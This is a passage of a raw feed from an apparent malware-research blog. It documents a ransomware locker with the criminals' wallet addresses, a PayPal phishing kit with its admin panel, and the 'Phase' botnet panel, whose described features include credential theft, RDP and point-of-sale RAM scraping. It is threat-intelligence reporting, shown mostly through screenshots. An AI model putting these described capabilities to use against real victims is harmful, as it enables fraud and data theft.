href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifDoM71JiWtjrUWHgPX_Yg7iCuHrLAJg4Xw8TJ26NupLcElDwKtdkx6-6O2MNkQ5E5VVwv9f7wulnUXmYVyrQN9QvTzswPAN0lzeB-umcKHoGJ-VKMWdlVUe9E8SYDpfNfHQKRa-gcEeU/s1600/23-01-2014+15-03-36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifDoM71JiWtjrUWHgPX_Yg7iCuHrLAJg4Xw8TJ26NupLcElDwKtdkx6-6O2MNkQ5E5VVwv9f7wulnUXmYVyrQN9QvTzswPAN0lzeB-umcKHoGJ-VKMWdlVUe9E8SYDpfNfHQKRa-gcEeU/s1600/23-01-2014+15-03-36.png" height="396" width="400" /></a></div> <br /> SQL database:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjilr4NhkvkSm-EKXGJXgY74UL2g4YCsSPKWtTxCo4F4TH1rYkMXcyZz6nNIMNMDeylmdwWCO_iaUPeefVV7fBKODBSjdrFNN-71eeaAROzEWt-7C5Gv74AwR5h8If5zMtNdvsc0lZnmD4/s1600/23-01-2014+15-12-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjilr4NhkvkSm-EKXGJXgY74UL2g4YCsSPKWtTxCo4F4TH1rYkMXcyZz6nNIMNMDeylmdwWCO_iaUPeefVV7fBKODBSjdrFNN-71eeaAROzEWt-7C5Gv74AwR5h8If5zMtNdvsc0lZnmD4/s1600/23-01-2014+15-12-38.png" height="350" width="400" /></a></div> <br /> Bad guy wallets:<br /> <a href="https://blockchain.info/address/1H6jc6Mz535zTts6DWdeJf3HdH4owGjsXo">1H6jc6Mz535zTts6DWdeJf3HdH4owGjsXo</a><br /> <a href="https://blockchain.info/address/15JTKDkU4U6Tn5MBc9Pt52mMzXDmvmaanR">15JTKDkU4U6Tn5MBc9Pt52mMzXDmvmaanR</a><br /> <a href="https://blockchain.info/address/18yP3oKzeqChWCYG2ZGPcBhMQBiXFeR2GF">18yP3oKzeqChWCYG2ZGPcBhMQBiXFeR2GF</a><br /> <a href="https://blockchain.info/address/17FSkXDULjtK6R9G3cpwmLMYbWRZJ9c8vZ">17FSkXDULjtK6R9G3cpwmLMYbWRZJ9c8vZ</a><br /> <a href="https://blockchain.info/address/1KZvxpPzvkSCqm3VTffWBWcLumWK1KJfkK">1KZvxpPzvkSCqm3VTffWBWcLumWK1KJfkK</a><br /> <br /> Pseudo decryptor ~ <a href="https://www.virustotal.com/en/file/e9014cb213ec5d73d4327205d457c93ca9c74bcd29dc2b47d2f7c8b09306be84/analysis/1390479428/">4a8e11468649e045976574691cf53732</a>https://www.xylibox.com/2015/01/cryptorbit-locker.htmlnoreply@blogger.com (Steven K)2tag:blogger.com,1999:blog-5365964245877416061.post-5299288915440189345Tue, 13 Jan 2015 00:49:00 +00002015-01-13T01:49:02.051+01:00Captain BarbarossaPaypalphishingPhishing kitCaptain Barbarossa, is used for Paypal phishing and sold as phishing kit, the kit include an admin panel.<br /> User is tricked with a fake Paypal login asking for details, here in German:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUb1RMVCa64Rt2TB6ZikCw_B7Tgr6xLDHCXn2XywOBQoJyEbP03x7ai0TnefS-0qDK8i6uc0N8kxQVM1RZx2QpUOu2QKDabQhjq1jXXJt9xlELoM10OEDQAy0ZCqxNxR5jBeCqCksF8U4/s1600/2014-11-09_16-14-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUb1RMVCa64Rt2TB6ZikCw_B7Tgr6xLDHCXn2XywOBQoJyEbP03x7ai0TnefS-0qDK8i6uc0N8kxQVM1RZx2QpUOu2QKDabQhjq1jXXJt9xlELoM10OEDQAy0ZCqxNxR5jBeCqCksF8U4/s1600/2014-11-09_16-14-31.png" height="365" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY5TFeFluRs6AOG4FgP5W8dT_6NQt3YpedjAO_OG71a-uSU7PrqMj3M8aaZE4H_nXcrLXb3Xojw0JQ-b-4cSwR7D10U9kPxTPWxZp618H_nn9mCLzj_YZJcM_tv6YgTCCT7fS8f2Pyop4/s1600/2014-11-09_16-16-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY5TFeFluRs6AOG4FgP5W8dT_6NQt3YpedjAO_OG71a-uSU7PrqMj3M8aaZE4H_nXcrLXb3Xojw0JQ-b-4cSwR7D10U9kPxTPWxZp618H_nn9mCLzj_YZJcM_tv6YgTCCT7fS8f2Pyop4/s1600/2014-11-09_16-16-20.png" height="218" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjABkxC79wCS2JUsiPe0GJ5_LbgJ01yV4GfPJBhqMkz8LCPeQJvEuvBiV_pTUTVyr8bZuhw9GrW8-zf8NR_PNTvJ2P2HpOkwU6kPnHuaT8MCGjmYII77VtOEsgr-eGkfxr-lwwPn2wNSII/s1600/2014-11-09_16-16-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjABkxC79wCS2JUsiPe0GJ5_LbgJ01yV4GfPJBhqMkz8LCPeQJvEuvBiV_pTUTVyr8bZuhw9GrW8-zf8NR_PNTvJ2P2HpOkwU6kPnHuaT8MCGjmYII77VtOEsgr-eGkfxr-lwwPn2wNSII/s1600/2014-11-09_16-16-43.png" height="218" width="400" /></a></div> <br /> Once infos are transmitted the datas are sent to the panel.<br /> Login:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6SO44Fv1ntt0DXvyS7aPgxOhZPeg54Jzrd5rpgbef7c1efnM-NcujlGC3edHLlCLaRe6EAI7N4cX2K5H0HgSZzEEZmhJA9FaqFOnKp_gofWX9iqypXXhHIofWtDmeM0XU02NgDquTEA/s1600/2014-11-09_16-08-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6SO44Fv1ntt0DXvyS7aPgxOhZPeg54Jzrd5rpgbef7c1efnM-NcujlGC3edHLlCLaRe6EAI7N4cX2K5H0HgSZzEEZmhJA9FaqFOnKp_gofWX9iqypXXhHIofWtDmeM0XU02NgDquTEA/s1600/2014-11-09_16-08-07.png" height="400" width="265" /></a></div> <br /> Main:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFqqmoiFcGfxq-wTv6ofQM_sHKtV7e6ALnkSM8BEnZWz_XZ2sx1_i8HUwS0AkPEEzfMRGvsZWagRidxEwYDey4ZdfvxV2kzXWfoN_ZArBj76ikwAQBnfcKls6OHjcY764iZfnWW9GG2pQ/s1600/2014-11-09_16-09-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFqqmoiFcGfxq-wTv6ofQM_sHKtV7e6ALnkSM8BEnZWz_XZ2sx1_i8HUwS0AkPEEzfMRGvsZWagRidxEwYDey4ZdfvxV2kzXWfoN_ZArBj76ikwAQBnfcKls6OHjcY764iZfnWW9GG2pQ/s1600/2014-11-09_16-09-59.png" height="283" width="400" /></a></div> <br /> Log manager:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0wR2ZF-FiAkWCkYxY1O62GsyItTpItf0vD6XPErcnRXbW-3O8o45qLChFaElpwg1EM6P_M5dtj7AEHljQY0cYXhZLjwPuIPn8F6RMUQ1eYF4W4-o6k5tIUKv1sEsKJjyppW4UhERi2c8/s1600/2014-11-09_16-11-32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0wR2ZF-FiAkWCkYxY1O62GsyItTpItf0vD6XPErcnRXbW-3O8o45qLChFaElpwg1EM6P_M5dtj7AEHljQY0cYXhZLjwPuIPn8F6RMUQ1eYF4W4-o6k5tIUKv1sEsKJjyppW4UhERi2c8/s1600/2014-11-09_16-11-32.png" height="268" width="400" /></a></div> https://www.xylibox.com/2015/01/captain-barbarossa.htmlnoreply@blogger.com (Steven K)3tag:blogger.com,1999:blog-5365964245877416061.post-1174706035477904326Mon, 12 Jan 2015 20:48:00 +00002015-01-12T21:48:37.563+01:00NapolarPhaseSolarSmall write-up about 'Phase' a malware who appeared and vanished very rapidly.<br /> I had a look on it with MalwareTech who wrote <a href="http://www.malwaretech.com/search?q=Phase%20Bot">several stories</a>, it was shown that Phase is in reality a 'new' version of Solar bot, at least not so new, the code is so copy/pasted that even Antivirus such as Avast do false positives and now detect Napolar (Solar) as PhaseBot.<br /> <br /> Advert:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0JheIjlO2Yj0mTQFhMmc80QXWJiZ_qydp4tvfH5f7KO533rzHLUTD79ti_SYafZm8O6_-xqHGY994vVK5NohU1-5Ei2Y4OtYSn0wIm487UOd-IRZZrJafaKbvgKGnlr3gyQdOM9JPDO4/s1600/2014-12-09_18-52-06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0JheIjlO2Yj0mTQFhMmc80QXWJiZ_qydp4tvfH5f7KO533rzHLUTD79ti_SYafZm8O6_-xqHGY994vVK5NohU1-5Ei2Y4OtYSn0wIm487UOd-IRZZrJafaKbvgKGnlr3gyQdOM9JPDO4/s1600/2014-12-09_18-52-06.png" height="238" width="400" /></a></div> <br /> Phase support website:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvXVfvMuCAWMpuyHhjqeyI_dGjh37Xc-HF4NLM9aAx7uLDlaNNNGCVhfdCNBngKrJAsFCD7pkWoicbwI2I20z87iNaEiTk7y5DxRCmTxOdNslKiDakz6R8zpx3PN_ufCS7mexbfrKuCA/s1600/2014-12-22_13-01-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvXVfvMuCAWMpuyHhjqeyI_dGjh37Xc-HF4NLM9aAx7uLDlaNNNGCVhfdCNBngKrJAsFCD7pkWoicbwI2I20z87iNaEiTk7y5DxRCmTxOdNslKiDakz6R8zpx3PN_ufCS7mexbfrKuCA/s1600/2014-12-22_13-01-59.png" height="255" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> The coder is using public snippet for chatting with customers:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKP17tpdizbqwwehxo0ypuxfOLEW-Osfqg96BfpRHRqT7y8oJI38zOCSDlFC4D5hurwP7eH5TLHY5VJ5c3IktyKFG_gbGjEDl3yXvcR2cJktr_RvWVZ1L4NuMNpzgaE-51u4iiXYNl8A/s1600/2014-12-13_11-29-40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKP17tpdizbqwwehxo0ypuxfOLEW-Osfqg96BfpRHRqT7y8oJI38zOCSDlFC4D5hurwP7eH5TLHY5VJ5c3IktyKFG_gbGjEDl3yXvcR2cJktr_RvWVZ1L4NuMNpzgaE-51u4iiXYNl8A/s1600/2014-12-13_11-29-40.png" height="382" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLtYDo_slVU5mCXXPPd5HggXjceA8TTwuWcn7N91DjiUEenROfwlPK3XpDvqfw6iHRsoBFuPrLxLc0E9O-thowE3638X7vgvDOvp-9pwNhBqrotNwxb25I72VHacn8HSch30-VlcKr1m0/s1600/2014-12-13_11-30-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLtYDo_slVU5mCXXPPd5HggXjceA8TTwuWcn7N91DjiUEenROfwlPK3XpDvqfw6iHRsoBFuPrLxLc0E9O-thowE3638X7vgvDOvp-9pwNhBqrotNwxb25I72VHacn8HSch30-VlcKr1m0/s1600/2014-12-13_11-30-57.png" height="380" width="400" /></a></div> So weak that this is even vulnerable to xss.<br /> <br /> Master balance ? less than &lt; 1k<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdwPQuKF7Sai_5IgIpfP5iEAAFIHg_ZxcEB9sjqlHvt4tuI1jEV0JUupTxd9FPMWvJKg944r09NHy7MVGMRrttGPtTDdXal19btzYooOq7GcGgTVyYqEODpQjg2P9fAMnKPIXhapuPrS4/s1600/2014-12-13_11-35-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdwPQuKF7Sai_5IgIpfP5iEAAFIHg_ZxcEB9sjqlHvt4tuI1jEV0JUupTxd9FPMWvJKg944r09NHy7MVGMRrttGPtTDdXal19btzYooOq7GcGgTVyYqEODpQjg2P9fAMnKPIXhapuPrS4/s1600/2014-12-13_11-35-02.png" height="83" width="400" /></a></div> Phase seem not so popular, and got also rapidly lynched by other actors on forums.<br /> <br /> Anyway let's have a look on the web panel.<br /> Login:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjSL23DBrRsKS4PBVbV5dUsIXR2UlIWIuPhkmp9vYTNoqeYcqkVpZLa5CkevdqoQwmK2PW7YbEV3RPkhPwh3Q_lDUatJRqMhT9-a32r3-lRYRhRTyWnnN_C2LYKW2lQQGbAN00vbC-n_4/s1600/2014-12-09_18-31-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjSL23DBrRsKS4PBVbV5dUsIXR2UlIWIuPhkmp9vYTNoqeYcqkVpZLa5CkevdqoQwmK2PW7YbEV3RPkhPwh3Q_lDUatJRqMhT9-a32r3-lRYRhRTyWnnN_C2LYKW2lQQGbAN00vbC-n_4/s1600/2014-12-09_18-31-34.png" height="400" width="370" /></a></div> <br /> Dashboard:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIEXJNd2k3StECrOIocAOsTorOZU-p3oCfRtPQg-CyGjgr3b_VoifFip7wZ36rDgKtVdsdrWjFtnibDt11hZSRt1csDBjSkshfc3yubMn0QonKaI3qC9V0xo1PPMOV41qlxczuA5rzu1E/s1600/2014-12-09_18-32-55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIEXJNd2k3StECrOIocAOsTorOZU-p3oCfRtPQg-CyGjgr3b_VoifFip7wZ36rDgKtVdsdrWjFtnibDt11hZSRt1csDBjSkshfc3yubMn0QonKaI3qC9V0xo1PPMOV41qlxczuA5rzu1E/s1600/2014-12-09_18-32-55.png" height="218" width="400" /></a></div> <br /> Commands:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFv2n-_DLb_URtNDkrp6GVCn7GlrYdyT75NKFje_hMZm4PdOGP3hcrf1eZCWer9SJRDChjy7btWUvJ4VmBmHf8syYEXs2A0ne_BddkDFisZJK-4N6i6QakyG7myereYIow3iE5Fg42UEE/s1600/2014-12-09_18-34-49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFv2n-_DLb_URtNDkrp6GVCn7GlrYdyT75NKFje_hMZm4PdOGP3hcrf1eZCWer9SJRDChjy7btWUvJ4VmBmHf8syYEXs2A0ne_BddkDFisZJK-4N6i6QakyG7myereYIow3iE5Fg42UEE/s1600/2014-12-09_18-34-49.png" height="640" width="343" /></a></div> <br /> Botlist:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1P7N0sU-9-JFg5cLW6nylvWZHoWYJLxdUhMT1xtJO_6AXft8uGxPOvGKeM-wXRczIliHkZZr9q979MQMaZ9v5VzNKPkKlCogwW51aL3jL2VvpRQNXhMa7z-udIfz8er67Py6I4-Teuf0/s1600/2014-12-09_18-35-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1P7N0sU-9-JFg5cLW6nylvWZHoWYJLxdUhMT1xtJO_6AXft8uGxPOvGKeM-wXRczIliHkZZr9q979MQMaZ9v5VzNKPkKlCogwW51aL3jL2VvpRQNXhMa7z-udIfz8er67Py6I4-Teuf0/s1600/2014-12-09_18-35-48.png" height="201" width="400" /></a></div> <br /> Credentials:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt2kIP5swL71TVxFvXLCBSX1E2ztVuDCmfkN17CypTYpLo0BMArk9FUVrwb8_wqCDzE6wu0XWVKJBmPkoD2T12VsiKaNgqsq6qy06jzCtNdu4AKFUslao3Qq7xyloSZuwkSGr4fJRIIsI/s1600/2014-12-09_18-36-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt2kIP5swL71TVxFvXLCBSX1E2ztVuDCmfkN17CypTYpLo0BMArk9FUVrwb8_wqCDzE6wu0XWVKJBmPkoD2T12VsiKaNgqsq6qy06jzCtNdu4AKFUslao3Qq7xyloSZuwkSGr4fJRIIsI/s1600/2014-12-09_18-36-48.png" height="201" width="400" /></a></div> <br /> Socks5:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBQK2neOIQ7Z1UgBtIMWYu3QD6XuG7on-gsRG2UtBs9APIzt6dOSXAhewdh1pHmj5w9ScNT61rZHds1RsYovXtQBntikYiprPuUOParSpcWXbmwNGNk_itYdCv0MOC_J5_5Iht_xJbhHQ/s1600/2014-12-09_18-37-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBQK2neOIQ7Z1UgBtIMWYu3QD6XuG7on-gsRG2UtBs9APIzt6dOSXAhewdh1pHmj5w9ScNT61rZHds1RsYovXtQBntikYiprPuUOParSpcWXbmwNGNk_itYdCv0MOC_J5_5Iht_xJbhHQ/s1600/2014-12-09_18-37-11.png" height="201" width="400" /></a></div> <br /> Browsers:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSw7xl98_ubkR8vwruOb8OT_ydMeJT0GyG7dJ3uM2_MbwOazaoN_UXAQF5RCBVkK8U_TZHlBYZHYuzT8Tt6gRcDmxBu9JeHjFV8Edh-upKp01_etFVxddg25j2dZrC1aqKJvZMhL-mn0k/s1600/2014-12-09_18-37-37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSw7xl98_ubkR8vwruOb8OT_ydMeJT0GyG7dJ3uM2_MbwOazaoN_UXAQF5RCBVkK8U_TZHlBYZHYuzT8Tt6gRcDmxBu9JeHjFV8Edh-upKp01_etFVxddg25j2dZrC1aqKJvZMhL-mn0k/s1600/2014-12-09_18-37-37.png" height="201" width="400" /></a></div> <br /> Modules:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbsCr9F_EYXLmlt_bvBTp0-tXiD-bAzrlVZqFc1Zq-Y6jqqtw88CxoiNGwGcIrCoGDHmYwH_OCHa5JoZaEhcgPFD4CDD-iWqIXVbwLuISYKnmIDdzUzrOd1-iJUS67qoypKkLZ_rxhm3w/s1600/2014-12-09_18-38-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbsCr9F_EYXLmlt_bvBTp0-tXiD-bAzrlVZqFc1Zq-Y6jqqtw88CxoiNGwGcIrCoGDHmYwH_OCHa5JoZaEhcgPFD4CDD-iWqIXVbwLuISYKnmIDdzUzrOd1-iJUS67qoypKkLZ_rxhm3w/s1600/2014-12-09_18-38-24.png" height="246" width="400" /></a></div> <br /> Analyzer detector:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6D8d1XD3TSj0Z67geI7VghxvgYDN9SvISkAahjP1KCtbaeiRtXPF0-PKG13hT8byCdCOgTkZ0AqxmBfxcNhClUYAwoY2kLA_GFwUDjO8OVmdUZyFE8ksZ5KjlVwN6n6G6qoIm3Mvnl1A/s1600/2014-12-09_18-38-49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6D8d1XD3TSj0Z67geI7VghxvgYDN9SvISkAahjP1KCtbaeiRtXPF0-PKG13hT8byCdCOgTkZ0AqxmBfxcNhClUYAwoY2kLA_GFwUDjO8OVmdUZyFE8ksZ5KjlVwN6n6G6qoIm3Mvnl1A/s1600/2014-12-09_18-38-49.png" height="185" width="400" /></a></div> <br /> RDP:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNfW9IYY2WLCoeY5OOYPo-YnHzw7DrZSu9Xt0Gs6yFI3J8UuQFFPAsspedsvQZkL8SasQ_2-wUNaPKk4ci4SH0K03S0c-OcwKFdikpLrGQ1e-ekI6deohKa1VNY_xL1oVWh80S4NGginA/s1600/2014-12-09_18-39-46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNfW9IYY2WLCoeY5OOYPo-YnHzw7DrZSu9Xt0Gs6yFI3J8UuQFFPAsspedsvQZkL8SasQ_2-wUNaPKk4ci4SH0K03S0c-OcwKFdikpLrGQ1e-ekI6deohKa1VNY_xL1oVWh80S4NGginA/s1600/2014-12-09_18-39-46.png" height="185" width="400" /></a></div> <br /> Settings:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpQjn_PJImcVnASjY2H1u70UBgHkOrYOIlyD7Z7_tXExsBPWv0TnSfkwr8RfSQ11jzFveGCfI35ehn1hjUMfMGA-6Q_B9PJ_izlOpI0PSZ4eiGe1NoRz7jI4V4oWFQBLYEgMoA4LPT5i4/s1600/2014-12-09_18-40-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpQjn_PJImcVnASjY2H1u70UBgHkOrYOIlyD7Z7_tXExsBPWv0TnSfkwr8RfSQ11jzFveGCfI35ehn1hjUMfMGA-6Q_B9PJ_izlOpI0PSZ4eiGe1NoRz7jI4V4oWFQBLYEgMoA4LPT5i4/s1600/2014-12-09_18-40-17.png" height="238" width="400" /></a></div> <br /> FAQ:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd4OqCRjUwG_zKp5U7HA8p7eFZx_RTmoLabyUtkIKWMsAolg2DEAO4ZHGXWehwHcSifWtg3_jTEm-D5FLOB67sX-hvXa4B1aPWqk7qRl_9RoG9ShB4UWfZEBza7K8wxNFnP_Z4IXKJ63M/s1600/2014-12-09_18-41-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd4OqCRjUwG_zKp5U7HA8p7eFZx_RTmoLabyUtkIKWMsAolg2DEAO4ZHGXWehwHcSifWtg3_jTEm-D5FLOB67sX-hvXa4B1aPWqk7qRl_9RoG9ShB4UWfZEBza7K8wxNFnP_Z4IXKJ63M/s1600/2014-12-09_18-41-16.png" height="640" width="376" /></a></div> <br /> Structure:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfW-3e4rn7nRY6YXM5gENGri8orH3sjwRFS7tFNPq0N6jI9THmBCVUi9MAP4wm6RlgjtSp-xOsr3fd3Zso04DfSzCGIRWGiJFC7y4LfnysnhGrb6nA7GarDBPeDskHT-e1WavQDRemgUs/s1600/2014-12-10_17-10-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfW-3e4rn7nRY6YXM5gENGri8orH3sjwRFS7tFNPq0N6jI9THmBCVUi9MAP4wm6RlgjtSp-xOsr3fd3Zso04DfSzCGIRWGiJFC7y4LfnysnhGrb6nA7GarDBPeDskHT-e1WavQDRemgUs/s1600/2014-12-10_17-10-39.png" height="112" width="400" /></a></div> <br /> In the wild panel, having Ram scrapper plugin + VNC:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgosB_f7TvNaTdmPPKD1Jlt01WTnmi_O7KW1oBZOuIcx675giVAnmaF4pRHss4TzehNl3dWlcE2zX8H0HQ16hG1aGWD9dmfrMbuINaoCXz7x60FWDqlOLpRBick4QeYuITvT0dotoGEqm4/s1600/2014-12-13_14-57-05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgosB_f7TvNaTdmPPKD1Jlt01WTnmi_O7KW1oBZOuIcx675giVAnmaF4pRHss4TzehNl3dWlcE2zX8H0HQ16hG1aGWD9dmfrMbuINaoCXz7x60FWDqlOLpRBick4QeYuITvT0dotoGEqm4/s1600/2014-12-13_14-57-05.png" height="295" width="400" /></a></div> <br /> Ram scrapper plugin:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzUk2PNznjrsFEKia6bD7dH2ZzsQX3-ve-rD72K4L5jdsQxotJcooErk1XV5et9ej6OXdQcHW-8SQdcGqWCACt-o3lG-eBemG-ApM7ntqyothesTWJ3mIWqIcrqqlIynpiXsExoHzrSes/s1600/2014-12-13_19-52-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzUk2PNznjrsFEKia6bD7dH2ZzsQX3-ve-rD72K4L5jdsQxotJcooErk1XV5et9ej6OXdQcHW-8SQdcGqWCACt-o3lG-eBemG-ApM7ntqyothesTWJ3mIWqIcrqqlIynpiXsExoHzrSes/s1600/2014-12-13_19-52-13.png" height="190" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> Point-of-sale remote controlled:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpc9_6RJriyAskiLLleLbyrBG1wuYB3IpRDLS2vL_xV9yohu-5dQTTc0KgGuTIAWme4s8IIGSJi_L2vqYCMrpexrPDCu-7hp879yDZWW-vjvVEa1dmk35PpxnFstUfE2r_OLaS84tn01g/s1600/2014-12-13_18-46-46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpc9_6RJriyAskiLLleLbyrBG1wuYB3IpRDLS2vL_xV9yohu-5dQTTc0KgGuTIAWme4s8IIGSJi_L2vqYCMrpexrPDCu-7hp879yDZWW-vjvVEa1dmk35PpxnFstUfE2r_OLaS84tn01g/s1600/2014-12-13_18-46-46.png" height="291" width="400" /></a></div> <br /> Another botnet with hacked point of sale remote controlled:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIlg_7I3yofdUsq4Wns375SzwW3DDtMzj4rAf-IKn8R07GUBfuZukJDM1H4JWa5eKE7_HkgIGgIGfS5TscfrTZi0Tz4q6jO3ZwLr13O162nzH_3Gz3WHVwtRZ_Cg7wuB7qN3KhMhVmcZA/s1600/2014-12-15_10-07-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" 